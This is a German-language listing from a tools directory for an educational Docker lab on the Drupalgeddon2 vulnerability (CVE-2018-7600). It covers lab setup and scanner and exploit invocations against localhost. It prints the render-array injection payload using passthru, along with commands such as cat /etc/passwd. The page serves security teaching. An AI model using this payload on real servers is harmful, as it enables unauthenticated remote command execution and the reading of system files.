Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2018-7600-drupalgeddon2-lab — Bildungslabor, das CVE-2018-7600 (Drupalgeddon2) Remote Code Execution unter Verwendung einer Docker-basierten, verwundbaren Drupal 7.56-Umgebung demonstriert. | Kitploit
Tools/GitHubGitHub/meraj1312/cve-2018-7600-drupalgeddon2-lab
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungPayload-EntwicklungLabs & Praxis
GitHub
meraj1312/cve-2018-7600-drupalgeddon2-lab

cve-2018-7600-drupalgeddon2-lab

Bildungslabor, das CVE-2018-7600 (Drupalgeddon2) Remote Code Execution unter Verwendung einer Docker-basierten, verwundbaren Drupal 7.56-Umgebung demonstriert.

Repository anzeigen
113vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-7600 Drupalgeddon2 Schwachstellen-Labor

Bildungslabor, das die Ausnutzung von CVE-2018-7600 (Drupalgeddon2) unter Verwendung einer verwundbaren Drupal 7.56-Umgebung demonstriert, die mit Docker bereitgestellt wird.

Dieses Projekt simuliert einen realen Schwachstellenbewertungs-Workflow, einschließlich:

  • Einrichtung der verwundbaren Umgebung
  • Erkennung (Scanner)
  • Ausnutzung (RCE)
  • Payload-Analyse
  • Dokumentation

Überblick über die Schwachstelle

CVE-2018-7600 (Drupalgeddon2) ist eine kritische Remote-Code-Ausführungs-Schwachstelle (RCE) im Drupal-CMS.

Das Problem existiert in der Formular-API von Drupal, wo benutzergesteuerte Eingaben als Render-Arrays interpretiert werden können, was es Angreifern ermöglicht, bösartige Callbacks wie folgende zu injizieren:

  • passthru
  • system
  • exec

Dies führt zu einer nicht authentifizierten Befehlsausführung auf dem Server.

Auswirkungen

  • Remote-Code-Ausführung
  • Keine Authentifizierung erforderlich
  • Vollständige Kompromittierung des Servers

Zielversion

  • Drupal 7.56 (verwundbar)

Laborarchitektur

root@kitploit:~

Attacker (Kali Linux)
|
| HTTP Requests
v
Drupal 7.56 (Vulnerable)
|
v
MySQL Database


Verwendete Technologien

  • Docker
  • Docker Compose
  • Drupal CMS
  • MySQL
  • Kali Linux
  • Python (Exploit & Scanner)

Repository-Struktur

root@kitploit:~

cve-2018-7600-drupalgeddon2-lab
│
├── README.md
├── setup.md
├── scan.py
├── exploit.py
│
├── lab-setup/
│   └── docker-compose.yml
│
├── screenshots/
│   ├── drupal-dashboard.png
│   ├── drupal-version.png
│   └── rce-output.png
│
├── logs/
│   ├── scan_results.txt
│   └── exploit_log.txt
│
├── payloads/
│   └── payload-list.txt
│
├── report/
│   └── drupalgeddon2-report.pdf


Screenshots

Drupal Dashboard

Drupal Dashboard

Bestätigung der Version

Drupal Version


Schnellstart

Repository klonen

root@kitploit:~
git clone https://github.com/Meraj1312/cve-2018-7600-drupalgeddon2-lab.git
cd cve-2018-7600-drupalgeddon2-lab

Labor starten

root@kitploit:~
docker compose up -d

Ziel aufrufen

root@kitploit:~
http://localhost:8080

Erkennung & Ausnutzung

1. Auf Schwachstelle scannen

root@kitploit:~
python3 scan.py http://localhost:8080

Beispielausgabe:

root@kitploit:~
[~] Scanning http://localhost:8080... VULNERABLE

2. Ausnutzen (RCE)

root@kitploit:~
python3 exploit.py http://localhost:8080 id

Beispielausgabe:

root@kitploit:~
uid=33(www-data) gid=33(www-data)

Payload-Beispiel

Grundlegende verwendete Payload-Struktur:

root@kitploit:~
name[#post_render][]=passthru
name[#type]=markup
name[#markup]=whoami

Beispielbefehle:

root@kitploit:~
whoami
id
cat /etc/passwd

Vollständige Payload-Liste verfügbar unter:

root@kitploit:~
payloads/payload-list.txt

Dokumentationsstrategie

Um eine saubere und professionelle Repository-Struktur zu erhalten:

README enthält:

  • Überblick über die Schwachstelle
  • Anweisungen zum Lab-Aufbau
  • Grundlegende Payload-Beispiele
  • So führen Sie Scanner und Exploit aus

PDF-Bericht (report/drupalgeddon2-report.pdf) enthält:

  • Detaillierte Ausnutzungsschritte
  • Burp-Suite-Anfragen und -Antworten
  • Ergebnisse der Payload-Tests
  • Bildschirmfotos der Ausführung
  • Technische Erklärung der Schwachstelle

Diese Trennung stellt sicher:

  • Saubere GitHub-Präsentation
  • Vollständige technische Dokumentation

Bildungszweck

Dieses Labor ist gedacht für:

  • Cybersicherheitsstudenten
  • Penetrationstest-Praxis
  • Schwachstellenforschung
  • Erlernen der Exploit-Entwicklung

Haftungsausschluss

Dieses Projekt dient nur zu Bildungs- und Forschungszwecken.

Versuchen Sie nicht, Systeme ohne ausdrückliche Genehmigung auszunutzen.

Die Autoren sind nicht verantwortlich für Missbrauch.

Tool herunterladen